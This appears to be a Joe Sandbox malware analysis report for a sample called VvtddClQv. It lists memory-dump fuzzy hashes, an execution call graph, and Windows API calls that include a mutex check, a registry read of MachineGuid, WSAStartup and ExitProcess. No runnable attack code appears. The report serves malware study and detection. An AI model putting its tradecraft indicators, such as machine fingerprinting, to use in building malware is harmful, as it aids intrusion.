                          • Source File: 0000000A.00000002.1822793486.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_10_2_4d60000_VvtddClQv.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7212a33612eba798c90a9d2d1cec6f6ffe20e02935160edfe9176ca1f3c1fa80
                          • Instruction ID: ca3ff6880dcd839d278ebf6b5dc43b829e238a5469652888f428375e3d7faa86
                          • Opcode Fuzzy Hash: 7212a33612eba798c90a9d2d1cec6f6ffe20e02935160edfe9176ca1f3c1fa80
                          • Instruction Fuzzy Hash: 93F05430B0020ACBDB18FFB6D4157AD7AA2BF84355F10846ED006A7281DFB85444CFA1
                          Memory Dump Source
                          • Source File: 0000000A.00000002.1822793486.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_10_2_4d60000_VvtddClQv.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 14cd1b9002f89dd079e38cf94e9e02c263b35eb46565d552b28d57c61e9ba86b
                          • Instruction ID: 08335e097e641867341fe559b314c1ce746f249038cc5ae51200fd9bb23d1ded
                          • Opcode Fuzzy Hash: 14cd1b9002f89dd079e38cf94e9e02c263b35eb46565d552b28d57c61e9ba86b
                          • Instruction Fuzzy Hash: 93F0A0B268D3C06FD7031B605CA28E83F31AF2721475A40DBD5818E5A3E22B8517C761
                          Memory Dump Source
                          • Source File: 0000000A.00000002.1822793486.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_10_2_4d60000_VvtddClQv.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 16758a38009dc0d56a1c1005a65e4cdaba4ddf5e6d458d227b5f085c95b83107
                          • Instruction ID: 36d8f70d3348ed5a0afa668feac70b941654abd36b205f74420bfc627bed386d
                          • Opcode Fuzzy Hash: 16758a38009dc0d56a1c1005a65e4cdaba4ddf5e6d458d227b5f085c95b83107
                          • Instruction Fuzzy Hash: FBE0BF72B102246BAB04DEA99C405AFBAEEDFC4554B10857A9909D7250EE30AD4187E4
                          Memory Dump Source
                          • Source File: 0000000A.00000002.1822793486.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_10_2_4d60000_VvtddClQv.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b829f1be4b18d073a0727f9e7db6cf9ce5acd02307be4ca0d541803261add8c5
                          • Instruction ID: 6b96ec156048138a27513dfa50ebc7f3fcd31e52822105581005264cc85ca600
                          • Opcode Fuzzy Hash: b829f1be4b18d073a0727f9e7db6cf9ce5acd02307be4ca0d541803261add8c5
                          • Instruction Fuzzy Hash: 62E06D709082449FDB15DBA4D9999DDBF70EB07321F2441DDD444A7362D2314906DB41
                          Memory Dump Source
                          • Source File: 0000000A.00000002.1822793486.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_10_2_4d60000_VvtddClQv.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 17845b8e56cb89b3a37cb11a1b565ef9f64420fad7a6531be65e83604af55ad3
                          • Instruction ID: 12c0e7afc4765995a32112f818c6c590fc41e2f961df9a88a288cf55b69b95df
                          • Opcode Fuzzy Hash: 17845b8e56cb89b3a37cb11a1b565ef9f64420fad7a6531be65e83604af55ad3
                          • Instruction Fuzzy Hash: 4CE0D835805368AFDB215F5CD4449947B68E701324F0644E6D545DB262CB79EC40CB91
                          Memory Dump Source
                          • Source File: 0000000A.00000002.1822793486.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_10_2_4d60000_VvtddClQv.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b8d6de04cae2bf9dae958321d75c5a8b184f441cab22419df837cfe2adfe203b
                          • Instruction ID: fb52a4527d2abb4fc2e94419263fb8f9d718f13b3fb88f11ff2474d48c1c37bb
                          • Opcode Fuzzy Hash: b8d6de04cae2bf9dae958321d75c5a8b184f441cab22419df837cfe2adfe203b
                          • Instruction Fuzzy Hash: C8F06D7415E3D14FDB13EB38A8B04883F70AE4320874901EBC0888F4A7CB685807C762
                          Memory Dump Source
                          • Source File: 0000000A.00000002.1822793486.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_10_2_4d60000_VvtddClQv.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 96026981143be5ee846063de32bf6dda433c4bd273dbca71d36c1225d013498c
                          • Instruction ID: 15461935feb26ec651eb54aebe4bd6d47474b31eeaf9458c9ace0ffb449dcc75
                          • Opcode Fuzzy Hash: 96026981143be5ee846063de32bf6dda433c4bd273dbca71d36c1225d013498c
                          • Instruction Fuzzy Hash: 4BE046B980A3858FD712CBB4961839C7FF4FB0A201F1508DAC885D3252E6300E48CB11
                          Memory Dump Source
                          • Source File: 0000000A.00000002.1822793486.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_10_2_4d60000_VvtddClQv.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 00ab89aaeca15faafd1c43c1325724767e20a0a63cdfedfd470b716d4a04ed99
                          • Instruction ID: 7c2f4efb45305ac9464ddfe331f76b0cc1ca3a541b12393e278942723e63db7e
                          • Opcode Fuzzy Hash: 00ab89aaeca15faafd1c43c1325724767e20a0a63cdfedfd470b716d4a04ed99
                          • Instruction Fuzzy Hash: 16E01274904208DFC714DFA4D94999DBFB4FB46311F2041D8D80567360D731AD40DB95
                          Memory Dump Source
                          • Source File: 0000000A.00000002.1822793486.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_10_2_4d60000_VvtddClQv.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7997db49ecf1e1b36812921a222689dab4c4ea7116ce79ee91dc1296ba8fc311
                          • Instruction ID: 319e9e845ea42001f879fd44ca8199e98f48a8ffe0e805758bd7ccc579783fbe
                          • Opcode Fuzzy Hash: 7997db49ecf1e1b36812921a222689dab4c4ea7116ce79ee91dc1296ba8fc311
                          • Instruction Fuzzy Hash: B1E012791493618FC3524B14E5545D83F70EF86254F5A04DAC481CF263C736890BCBD1
                          Memory Dump Source
                          • Source File: 0000000A.00000002.1822793486.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_10_2_4d60000_VvtddClQv.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: aaa49db7687a9712deff6f58b451dd9b25c1d5d5897b9c9885cc3a94d7a0fc5d
                          • Instruction ID: 4bd1cfc90a7a74e1b40679240d0bbb76aa66f0b978e1fb2353d63a3fc9e33803
                          • Opcode Fuzzy Hash: aaa49db7687a9712deff6f58b451dd9b25c1d5d5897b9c9885cc3a94d7a0fc5d
                          • Instruction Fuzzy Hash: E4D052B180520AEFCB10DFA9A91869DBBFCEB0A311F1008E8A808D3300EA301E009B80
                          Memory Dump Source
                          • Source File: 0000000A.00000002.1822793486.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_10_2_4d60000_VvtddClQv.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ee51bc9f6ead624ede28b207eb282274890da724f47323fc312d47727522c9ab
                          • Instruction ID: 5bcafe1e3b5aeb42a811c2e3b5f33d94794973c1f55f91933511a3dd0b5c2cfe
                          • Opcode Fuzzy Hash: ee51bc9f6ead624ede28b207eb282274890da724f47323fc312d47727522c9ab
                          • Instruction Fuzzy Hash: 0EE092B094462BCFDB60DF64DC94BADBBB1BB45300F0055EA851AAB290EB701A89CF55
                          Memory Dump Source
                          • Source File: 0000000A.00000002.1822793486.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_10_2_4d60000_VvtddClQv.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 614242f9da63b4a2877a3012f6da6b65e85c00493a3a79de07f8e08f786f1754
                          • Instruction ID: 1e12236547e94265303fdc8f78b6aa1c61e9bba36fe0ffc252733ba2b68608ba
                          • Opcode Fuzzy Hash: 614242f9da63b4a2877a3012f6da6b65e85c00493a3a79de07f8e08f786f1754
                          • Instruction Fuzzy Hash: 4FE06775A40209DFD740DF65E5A9AAEBBB0EF0C314F24845AE816F7761CB74A848CF50
                          Memory Dump Source
                          • Source File: 0000000A.00000002.1822793486.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_10_2_4d60000_VvtddClQv.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 794dd8c729674652e0d7470493874e27960afb1eca63f0485cfdc2e05663d41f
                          • Instruction ID: 9dd0deb6dd3a236bae70b283b48267358911915b34e5115e8588a24fe07e05ed
                          • Opcode Fuzzy Hash: 794dd8c729674652e0d7470493874e27960afb1eca63f0485cfdc2e05663d41f
                          • Instruction Fuzzy Hash: 1CC04C2114A7959FC313875289345C13FB1AD0755474A04D6D4D2CB6A7D7194809D7A1
                          Memory Dump Source
                          • Source File: 0000000A.00000002.1822793486.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_10_2_4d60000_VvtddClQv.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7e240cf217069b5810f13aec3208ae2b984452b747e21f33a881c4b4f1e8239f
                          • Instruction ID: 809564760dc30a5dceecfddbcf7829c6c317a5c984488195c81cf29d5941ee7b
                          • Opcode Fuzzy Hash: 7e240cf217069b5810f13aec3208ae2b984452b747e21f33a881c4b4f1e8239f
                          • Instruction Fuzzy Hash: A0C00232144108BBDB027A81E811E59BF2AAB55694F548055FB040D161D673E562ABA0
                          Memory Dump Source
                          • Source File: 0000000A.00000002.1822793486.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_10_2_4d60000_VvtddClQv.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5a5afeed1ce70e74abd2d9666ee0c7661302cf717c703406173e7d5edb2bdca7
                          • Instruction ID: 639555b3b8466967089f4031a5affc7e9242cd9b362e94fc947d9b1902ac5144
                          • Opcode Fuzzy Hash: 5a5afeed1ce70e74abd2d9666ee0c7661302cf717c703406173e7d5edb2bdca7
                          • Instruction Fuzzy Hash: 5DC09B5850E3D49FC60386111C3C2553F71DD4245434D05C644C1CB1EBD5194C5E87A5
                          Memory Dump Source
                          • Source File: 0000000A.00000002.1823119163.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_10_2_4fb0000_VvtddClQv.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 283f59ab15d732fd488a323496f84466ec8d1de6e42fd952f1fcd74ef028465b
                          • Instruction ID: 7cedf9ad50e2828f0cac68b3e898f09f24dd7c20215c779e2dee6c2cfa97ea19
                          • Opcode Fuzzy Hash: 283f59ab15d732fd488a323496f84466ec8d1de6e42fd952f1fcd74ef028465b
                          • Instruction Fuzzy Hash: ADB0926A259340E67800A2A59C50AAB6420BBA6B08B449C1522CA600108920B426A26B

                          Execution Graph

                          Execution Coverage:3.1%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:1.3%
                          Total number of Nodes:302
                          Total number of Limit Nodes:13
                          execution_graph 8922 408952 8943 40823f 8922->8943 8924 408960 8927 4056bf 2 API calls 8924->8927 8928 40896a 8927->8928 8971 408862 8928->8971 8930 4089c4 8931 413aca 4 API calls 8930->8931 8932 4089d4 8931->8932 8934 405695 2 API calls 8932->8934 8933 408975 8933->8930 8979 4087d6 8933->8979 8936 4089df 8934->8936 8941 402bab 2 API calls 8942 40899d 8941->8942 8942->8930 8942->8941 8944 40824d 8943->8944 8945 4031e5 3 API calls 8944->8945 8958 40831b 8944->8958 8946 40826d 8945->8946 8947 4031e5 3 API calls 8946->8947 8948 408289 8947->8948 8949 4031e5 3 API calls 8948->8949 8950 4082a5 8949->8950 8951 4031e5 3 API calls 8950->8951 8952 4082c1 8951->8952 8953 4031e5 3 API calls 8952->8953 8954 4082e2 8953->8954 8955 4031e5 3 API calls 8954->8955 8956 4082ff 8955->8956 8957 4031e5 3 API calls 8956->8957 8957->8958 8958->8924 8959 4083bb 8958->8959 9007 408363 8959->9007 8962 4084ab 8962->8924 8963 4056bf 2 API calls 8968 4083f4 8963->8968 8964 408492 8965 413aca 4 API calls 8964->8965 8966 4084a0 8965->8966 8967 405695 2 API calls 8966->8967 8967->8962 8968->8964 9010 40815d 8968->9010 9025 40805d 8968->9025 9040 404b8f 8971->9040 8973 40887e 8974 4031e5 3 API calls 8973->8974 8975 40893e 8973->8975 8977 408946 8973->8977 8978 402b7c 2 API calls 8973->8978 8974->8973 9043 404a39 8975->9043 8977->8933 8978->8973 8980 402b7c 2 API calls 8979->8980 8981 4087e7 8980->8981 8982 40885a 8981->8982 8983 4031e5 3 API calls 8981->8983 8991 408749 8982->8991 8986 408802 8983->8986 8984 408853 8985 402bab 2 API calls 8984->8985 8985->8982 8986->8984 8988 40884d 8986->8988 9052 408522 8986->9052 9056 4084b4 8986->9056 9059 4084d4 8988->9059 8992 404b8f 3 API calls 8991->8992 8998 408765 8992->8998 8993 4087cf 8999 4085d1 8993->8999 8994 4031e5 3 API calls 8994->8998 8995 408522 3 API calls 8995->8998 8996 4087c7 8997 404a39 4 API calls 8996->8997 8997->8993 8998->8993 8998->8994 8998->8995 8998->8996 9000 4086c2 8999->9000 9003 4085e9 8999->9003 9000->8942 9002 402bab 2 API calls 9002->9003 9003->9000 9003->9002 9004 4031e5 3 API calls 9003->9004 9065 4089e6 9003->9065 9084 4086c9 9003->9084 9088 4036a3 9003->9088 9004->9003 9008 4031e5 3 API calls 9007->9008 9009 408386 9008->9009 9009->8962 9009->8963 9011 40816f 9010->9011 9012 4081b6 9011->9012 9013 4081fd 9011->9013 9024 4081ef 9011->9024 9015 405872 4 API calls 9012->9015 9014 405872 4 API calls 9013->9014 9016 408213 9014->9016 9017 4081cf 9015->9017 9018 405872 4 API calls 9016->9018 9019 405872 4 API calls 9017->9019 9020 408222 9018->9020 9021 4081df 9019->9021 9022 405872 4 API calls 9020->9022 9023 405872 4 API calls 9021->9023 9022->9024 9023->9024 9024->8968 9026 40808c 9025->9026 9027 4080d2 9026->9027 9028 408119 9026->9028 9039 40810b 9026->9039 9029 405872 4 API calls 9027->9029 9030 405872 4 API calls 9028->9030 9031 4080eb 9029->9031 9032 40812f 9030->9032 9033 405872 4 API calls 9031->9033 9034 405872 4 API calls 9032->9034 9035 4080fb 9033->9035 9036 40813e 9034->9036 9037 405872 4 API calls 9035->9037 9038 405872 4 API calls 9036->9038 9037->9039 9038->9039 9039->8968 9046 404a19 9040->9046 9049 4049ff 9043->9049 9045 404a44 9045->8977 9047 4031e5 3 API calls 9046->9047 9048 404a2c 9047->9048 9048->8973 9050 4031e5 3 API calls 9049->9050 9051 404a12 RegCloseKey 9050->9051 9051->9045 9053 408534 9052->9053 9055 4085af 9053->9055 9062 4084ee 9053->9062 9055->8986 9057 4031e5 3 API calls 9056->9057 9058 4084c7 9057->9058 9058->8986 9060 4031e5 3 API calls 9059->9060 9061 4084e7 9060->9061 9061->8984 9063 4031e5 3 API calls 9062->9063 9064 408501 9063->9064 9064->9055 9066 4031e5 3 API calls 9065->9066 9067 408a06 9066->9067 9068 4031e5 3 API calls 9067->9068 9072 408b21 9067->9072 9071 408a32 9068->9071 9069 408b17 9100 403649 9069->9100 9071->9069 9091 403666 9071->9091 9072->9003 9075 408b0e 9097 40362f 9075->9097 9077 4031e5 3 API calls 9078 408a88 9077->9078 9078->9075 9079 4031e5 3 API calls 9078->9079 9080 408ac4 9079->9080 9081 405b6f 5 API calls 9080->9081 9082 408aff 9081->9082 9082->9075 9094 408508 9082->9094 9085 4086e2 9084->9085 9086 408744 9084->9086 9085->9086 9087 405872 GetProcessHeap HeapAlloc GetProcessHeap HeapFree 9085->9087 9086->9003 9087->9085 9089 4031e5 3 API calls 9088->9089 9090 4036b5 9089->9090 9090->9003 9092 4031e5 3 API calls 9091->9092 9093 403679 9092->9093 9093->9075 9093->9077 9095 4031e5 3 API calls 9094->9095 9096 40851b 9095->9096 9096->9075 9098 4031e5 3 API calls 9097->9098 9099 403642 9098->9099 9099->9069 9101 4031e5 3 API calls 9100->9101 9102 40365c 9101->9102 9102->9072 8080 402c1f 8081 4031e5 3 API calls 8080->8081 8082 402c31 LoadLibraryW 8081->8082 8039 405924 8042 4031e5 8039->8042 8043 4031f3 8042->8043 8044 403236 8042->8044 8043->8044 8046 403208 8043->8046 8053 4030a5 8044->8053 8059 403263 8046->8059 8047 403258 8049 4031e5 3 API calls 8049->8047 8050 40320d 8050->8047 8051 4030a5 3 API calls 8050->8051 8052 403224 8051->8052 8052->8047 8052->8049 8065 402ca4 8053->8065 8055 4030b0 8056 4030b5 8055->8056 8069 4030c4 8055->8069 8056->8052 8060 40326d 8059->8060 8064 4032b7 8060->8064 8078 402b7c GetProcessHeap HeapAlloc 8060->8078 8062 402b7c 2 API calls 8062->8064 8063 40328c 8063->8062 8064->8050 8066 403079 8065->8066 8068 40307c 8066->8068 8073 40317b GetPEB 8066->8073 8068->8055 8070 4030eb 8069->8070 8072 4030c0 8070->8072 8075 402c03 8070->8075 8072->8052 8074 40319b 8073->8074 8074->8068 8076 4031e5 3 API calls 8075->8076 8077 402c15 8076->8077 8077->8072 8079 402b98 8078->8079 8079->8063 8083 4139de 8092 413855 8083->8092 8085 4139f1 8086 413838 GetProcessHeap HeapAlloc GetPEB 8085->8086 8088 4139f7 8086->8088 8087 413866 21 API calls 8089 413a2d 8087->8089 8088->8087 8090 413b81 GetProcessHeap HeapAlloc GetPEB ExitProcess 8089->8090 8091 413a34 8090->8091 8093 4031e5 3 API calls 8092->8093 8094 413864 8093->8094 8094->8094 8038 404df3 WSAStartup 10628 40f980 10643 413c87 10628->10643 10630 40fa19 10631 40fa08 10632 402bab 2 API calls 10631->10632 10632->10630 10633 40f993 10633->10630 10633->10631 10634 40429b 3 API calls 10633->10634 10635 40f9ca 10634->10635 10665 4060bd 10635->10665 10640 412093 6 API calls 10641 40f9f6 10640->10641 10642 412093 6 API calls 10641->10642 10642->10631 10683 413d97 10643->10683 10646 404056 5 API calls 10648 413cad 10646->10648 10647 413c9f 10647->10633 10648->10647 10649 405b6f 5 API calls 10648->10649 10651 413d10 10649->10651 10650 413d7b 10654 402bab 2 API calls 10650->10654 10651->10650 10652 403c62 3 API calls 10651->10652 10653 413d1f 10652->10653 10653->10650 10655 413d5a 10653->10655 10656 413d2c 10653->10656 10654->10647 10658 405b6f 5 API calls 10655->10658 10657 405dc5 3 API calls 10656->10657 10659 413d33 10657->10659 10660 413d55 10658->10660 10659->10660 10662 405b6f 5 API calls 10659->10662 10661 402bab 2 API calls 10660->10661 10661->10650 10663 413d48 10662->10663 10664 402bab 2 API calls 10663->10664 10664->10660 10666 4031e5 3 API calls 10665->10666 10667 4060dd 10666->10667 10668 406126 10667->10668 10669 4031e5 3 API calls 10667->10669 10668->10631 10672 40650a 10668->10672 10670 40610f 10669->10670 10746 40604f 10670->10746 10673 4060ac 3 API calls 10672->10673 10674 406519 10673->10674 10675 4031e5 3 API calls 10674->10675 10676 406529 10675->10676 10677 406599 10676->10677 10678 4031e5 3 API calls 10676->10678 10677->10640 10679 406544 10678->10679 10680 40657f 10679->10680 10682 4031e5 3 API calls 10679->10682 10681 403c40 3 API calls 10680->10681 10681->10677 10682->10680 10684 413da0 10683->10684 10685 413c96 10683->10685 10689 4065a2 10684->10689 10685->10646 10685->10647 10688 405dc5 3 API calls 10688->10685 10704 404a52 10689->10704 10691 406638 10691->10685 10691->10688 10692 4065c0 10692->10691 10716 40393f 10692->10716 10695 406631 10696 402bab 2 API calls 10695->10696 10696->10691 10697 4059d8 3 API calls 10698 4065e9 10697->10698 10699 402b7c 2 API calls 10698->10699 10703 40662a 10698->10703 10701 4065f8 10699->10701 10700 402bab 2 API calls 10700->10695 10702 402bab 2 API calls 10701->10702 10702->10703 10703->10700 10705 402b7c 2 API calls 10704->10705 10706 404a65 10705->10706 10707 4031e5 3 API calls 10706->10707 10713 404ac6 10706->10713 10708 404a8a RegOpenKeyExA 10707->10708 10709 404aa0 10708->10709 10710 404aca 10708->10710 10711 4031e5 3 API calls 10709->10711 10712 402bab 2 API calls 10710->10712 10714 404ab1 RegQueryValueExA 10711->10714 10712->10713 10713->10692 10715 404a39 4 API calls 10714->10715 10715->10713 10723 403843 10716->10723 10720 403961 10721 402bab 2 API calls 10720->10721 10722 403969 10721->10722 10722->10695 10722->10697 10724 403861 10723->10724 10725 402b7c 2 API calls 10724->10725 10727 403875 10725->10727 10726 403923 10726->10722 10742 403aef 10726->10742 10727->10726 10728 4031e5 3 API calls 10727->10728 10729 40389b 10728->10729 10729->10726 10730 4031e5 3 API calls 10729->10730 10731 4038c5 10730->10731 10732 40392a 10731->10732 10734 403666 3 API calls 10731->10734 10733 403649 3 API calls 10732->10733 10733->10726 10735 4038e7 10734->10735 10735->10732 10736 4031e5 3 API calls 10735->10736 10737 403901 10736->10737 10737->10732 10738 403911 10737->10738 10739 40362f 3 API calls 10738->10739 10740 403919 10739->10740 10741 403649 3 API calls 10740->10741 10741->10726 10743 403afc 10742->10743 10744 402b7c 2 API calls 10743->10744 10745 403b16 10744->10745 10745->10720 10747 4031e5 3 API calls 10746->10747 10748 406062 10747->10748 10748->10668

                          Control-flow Graph

                          APIs
                          • SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
                          • CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
                          • GetLastError.KERNEL32 ref: 0041399E
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1819325215.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_VvtddClQv.jbxd
                          Yara matches
                          Similarity
                          • API ID: Error$CreateLastModeMutex
                          • String ID:
                          • API String ID: 3448925889-0
                          • Opcode ID: 24802840a9e80e41c8200fa87372d6a1c573b20100aacb3c492bf68185cebf66
                          • Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
                          • Opcode Fuzzy Hash: 24802840a9e80e41c8200fa87372d6a1c573b20100aacb3c492bf68185cebf66
                          • Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E

                          Control-flow Graph

                          APIs
                            • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                            • Part of subcall function 00402B7C: HeapAlloc.KERNEL32(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                          • RegOpenKeyExA.KERNELBASE(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
                          • RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1819325215.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_VvtddClQv.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocOpenProcessQueryValue
                          • String ID:
                          • API String ID: 3676486918-0
                          • Opcode ID: df5e51209e30d87507a4750a0631f6435c2f152f95c8b1de61f5c825813b11bc
                          • Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
                          • Opcode Fuzzy Hash: df5e51209e30d87507a4750a0631f6435c2f152f95c8b1de61f5c825813b11bc
                          • Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 82 404df3-404e16 WSAStartup
                          APIs
                          • WSAStartup.WS2_32(00000202,?), ref: 00404E08
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1819325215.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_VvtddClQv.jbxd
                          Yara matches
                          Similarity
                          • API ID: Startup
                          • String ID:
                          • API String ID: 724789610-0
                          • Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                          • Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
                          • Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                          • Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 83 402c1f-402c37 call 4031e5 LoadLibraryW
                          APIs
                          • LoadLibraryW.KERNELBASE(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1819325215.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_VvtddClQv.jbxd
                          Yara matches
                          Similarity
                          • API ID: LibraryLoad
                          • String ID:
                          • API String ID: 1029625771-0
                          • Opcode ID: 1e00aa432103c00395cacdadc05548eaee9b0074d701dd53c2a9d16b249f06e7
                          • Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
                          • Opcode Fuzzy Hash: 1e00aa432103c00395cacdadc05548eaee9b0074d701dd53c2a9d16b249f06e7
                          • Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 86 413a3f-413a57 call 4031e5 ExitProcess
                          APIs
                          • ExitProcess.KERNEL32(00000000,00000000,E567384D,00000000,00000000,?,00413B8D,00000000,?,?,004139CC,00000000), ref: 00413A54
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1819325215.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_VvtddClQv.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitProcess
                          • String ID:
                          • API String ID: 621844428-0
                          • Opcode ID: 28892627b4184eb34835cb905e0569b311a61ada9086cb921d1e57989bacd3e5
                          • Instruction ID: a51fc36abc950c8e07eb8ba8f8e19e2949325f4e0a3e122df0d5a7568418e784
                          • Opcode Fuzzy Hash: 28892627b4184eb34835cb905e0569b311a61ada9086cb921d1e57989bacd3e5
                          • Instruction Fuzzy Hash: 52B092B11042087EAA402EF19C05D3B3A4DCA44508B0044357C08E5422E936EE2050A4

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 89 4049ff-404a18 call 4031e5 RegCloseKey
                          APIs
                          • RegCloseKey.KERNELBASE(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1819325215.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_VvtddClQv.jbxd
                          Yara matches
                          Similarity
                          • API ID: Close
                          • String ID:
                          • API String ID: 3535843008-0
                          • Opcode ID: fd13a4ababa05b6dfa8c376aed1a70cd2f6ce4ef8af563d78b915090b99271a8
                          • Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
